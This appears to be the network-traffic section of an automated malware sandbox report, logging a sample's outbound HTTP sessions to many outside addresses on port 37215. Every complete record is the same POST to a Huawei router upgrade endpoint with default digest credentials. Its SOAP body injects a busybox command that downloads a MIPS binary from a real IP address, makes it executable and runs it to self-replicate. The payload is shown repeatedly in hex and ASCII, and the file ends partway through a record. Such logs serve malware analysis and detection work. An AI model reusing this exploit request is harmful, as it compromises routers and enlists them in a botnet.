2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  208192.168.2.1343270157.236.132.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.076296091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  209192.168.2.1353414197.51.163.25137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.076303959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  210192.168.2.134588641.175.203.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.076308012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  211192.168.2.1360372157.4.205.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.076843977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  212192.168.2.1344550157.69.235.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.076884985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  213192.168.2.1346096157.119.207.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.076896906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  214192.168.2.1336324157.10.162.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.076924086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  215192.168.2.134386484.35.213.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.076932907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  216192.168.2.133311041.95.10.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.076953888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  217192.168.2.1356500157.71.191.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.076963902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  218192.168.2.134014641.132.97.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.076971054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
